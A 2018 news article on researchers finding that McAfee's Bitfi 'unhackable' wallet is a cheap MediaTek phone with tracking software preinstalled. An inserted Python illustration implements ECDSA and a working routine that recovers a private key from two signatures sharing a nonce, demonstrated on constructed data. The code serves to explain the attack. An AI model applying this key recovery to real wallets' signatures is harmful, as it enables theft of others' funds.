Security Researchers Break Down McAfee-Endorsed Cryptocurrency Wallet, Find Nothing but a Cheap Smartphone
The world’s first “unhackable” cryptocurrency wallet, as claimed by John McAfee, faced the wrath of security researchers soon after its announcement on July 28, 2018.
Not so Unhackable
Security researcher Ryan Castellucci first called out Bitfi’s supposed security features on his blog, breaking down several aspects that struck experts as suspicious. Following Castellucci’s coverage, other researchers shared their findings and opinions on Twitter and Reddit.
For the uninitiated, McAfee advertised the Bitfi wallet on July 24, 2018, via Twitter, offering a bounty of $100,000 to anyone who could hack the “unhackable wallet.” Bitfi further claimed the amount was not a mere gimmick, pointing to the device’s “absolute security.”
However, Castellucci and others found that the wallet lacks any dedicated security hardware or software and closely resembles an ordinary consumer device; based on the released photos, they called it a “cheap stripped down Android phone.”
Don’t trust the new BitFi hardware wallet. pic.twitter.com/ywFG8pS0Ms
— Whalepool (@whalepool) July 28, 2018
Researchers have compiled a substantial listing, published on Pastebin, of what the device loads into memory at startup. The listing gives an overview of every process pre-installed on the Bitfi wallet.
While the investigation revealed the absence of any internal cold storage, researchers were most startled by the presence of Adups FOTA, a firmware-update application known to relay sensitive user data, such as calls, texts, and location, to its servers in China every 72 hours.
Tracking Device or Storage Device?
Bitfi additionally ships with a pre-installed Baidu component, a Chinese location service with built-in GPS tracking. Alarmingly, both applications in question appeared to be transmitting data to Chinese servers during the tests.
Update on the BitFi device so far
Most of the firmware looks just like a normal MTK phone, including:
– A Baidu GPS/WIFI tracker
– The well-known Adups FOTA malware suite
– The entire Mediatek library of example apps
– A tracker, capable of logging all activity on the device
— OverSoft (@OverSoftNL) July 30, 2018
Interestingly, the bounty comes with its own set of terms and conditions. Researchers first have to purchase a $120 Bitfi device, pay $10 to load it with coins, and then hack their own device. Castellucci added:
“A researcher found, for example, [if] the device had a weak RNG that allowed for key recovery by examining a series of transactions generated by it, they would not win the bounty. Neither would they for finding a way to hijack their automatic update system to install a keylogger.”
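The first scenario in the quote, key recovery from transactions produced by a weak RNG, is the classic ECDSA nonce-reuse attack. The following Python is an added illustration, not code from the article, from Castellucci, or from Bitfi: it implements textbook ECDSA over secp256k1 (the curve Bitcoin uses), signs two constructed transaction hashes with the same nonce, as a broken RNG would, and recovers the private key from the two signatures alone. The private key, the repeated nonce, and the transaction hashes are all constructed for the demonstration; the curve constants are the published secp256k1 parameters.

```python
import hashlib

# secp256k1 domain parameters (the curve used by Bitcoin).
P = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFC2F
N = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141
G = (0x79BE667EF9DCBBAC55A06295CE870B07029BFCDB2DCE28D959F2815B16F81798,
     0x483ADA7726A3C4655DA4FBFC0E1108A8FD17B448A68554199C47D08FFB10D4B8)


def inv(a, m):
    """Modular inverse (Python 3.8+)."""
    return pow(a, -1, m)


def ec_add(p, q):
    """Affine point addition on secp256k1; None is the point at infinity."""
    if p is None:
        return q
    if q is None:
        return p
    x1, y1 = p
    x2, y2 = q
    if x1 == x2 and (y1 + y2) % P == 0:
        return None
    if p == q:
        lam = 3 * x1 * x1 * inv(2 * y1, P) % P
    else:
        lam = (y2 - y1) * inv((x2 - x1) % P, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return (x3, (lam * (x1 - x3) - y1) % P)


def ec_mul(k, p):
    """Double-and-add scalar multiplication."""
    r = None
    while k:
        if k & 1:
            r = ec_add(r, p)
        p = ec_add(p, p)
        k >>= 1
    return r


def hash_to_int(msg):
    return int.from_bytes(hashlib.sha256(msg).digest(), "big")


def sign(d, z, k):
    """Textbook ECDSA; the caller supplies the nonce k, which is the bug we model."""
    r = ec_mul(k, G)[0] % N
    s = inv(k, N) * (z + r * d) % N
    return (r, s)


def verify(pub, z, sig):
    r, s = sig
    if not (0 < r < N and 0 < s < N):
        return False
    w = inv(s, N)
    pt = ec_add(ec_mul(z * w % N, G), ec_mul(r * w % N, pub))
    return pt is not None and pt[0] % N == r


def recover_private_key(pub, z1, sig1, z2, sig2):
    """Recover d from two signatures sharing r, i.e. made with the same nonce k.

    From s = k^-1 (z + r*d):  k = (z1 - z2) / (s1 - s2),  d = (s*k - z) / r.
    Bitcoin wallets usually normalise s to the low half of the range, which is
    equivalent to negating k, so both signs of s2 are tried and each candidate
    is checked against the public key.
    """
    r1, s1 = sig1
    r2, s2 = sig2
    if r1 != r2:
        raise ValueError("different r values: the nonce was not reused")
    for s2c in (s2, (N - s2) % N):
        if (s1 - s2c) % N == 0:
            continue
        k = (z1 - z2) * inv((s1 - s2c) % N, N) % N
        d = (s1 * k - z1) * inv(r1, N) % N
        if ec_mul(d, G) == pub:
            return d
    return None


def demo():
    """Constructed scenario: a wallet whose RNG hands out the same nonce twice."""
    d = hash_to_int(b"constructed demo private key") % N          # constructed
    pub = ec_mul(d, G)
    k = hash_to_int(b"broken RNG that always returns this") % N   # constructed
    z1 = hash_to_int(b"constructed tx 1: pay 0.1 BTC to A")      # constructed
    z2 = hash_to_int(b"constructed tx 2: pay 0.2 BTC to B")      # constructed
    sig1 = sign(d, z1, k)
    sig2 = sign(d, z2, k)
    assert verify(pub, z1, sig1) and verify(pub, z2, sig2)
    return d, recover_private_key(pub, z1, sig1, z2, sig2)


if __name__ == "__main__":
    d, recovered = demo()
    print("recovered key matches:", d == recovered)
```

Everything the attacker needs here is public: two signatures and the hashes they cover, all of which sit on the blockchain. The bounty terms exclude exactly this class of finding, so the exclusion matters for any wallet that generates nonces on a commodity phone rather than in a secure element.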
Other security researchers shared their findings on Twitter:
So now we have pictures of the bare @Bitfi6 board.
It's just a MEDIATEK MT6580.
No sign of a secure element.
— Ask Cybergibbons! (@cybergibbons) July 29, 2018
From these findings, Bitfi appears to have purchased cheap mobile phones in bulk and shipped them as a cryptocurrency wallet, with no regard for data privacy or the potential loss of funds.
Meanwhile, McAfee confirmed on Twitter that the Bitfi device has no internal storage, stating that the wallet receives instructions “for each coin from our servers.” This makes the product little more than an online wallet with a dedicated device for access, and it puts Bitfi’s servers and the device’s update channel squarely inside the trust boundary, which is precisely the attack surface the bounty terms exclude.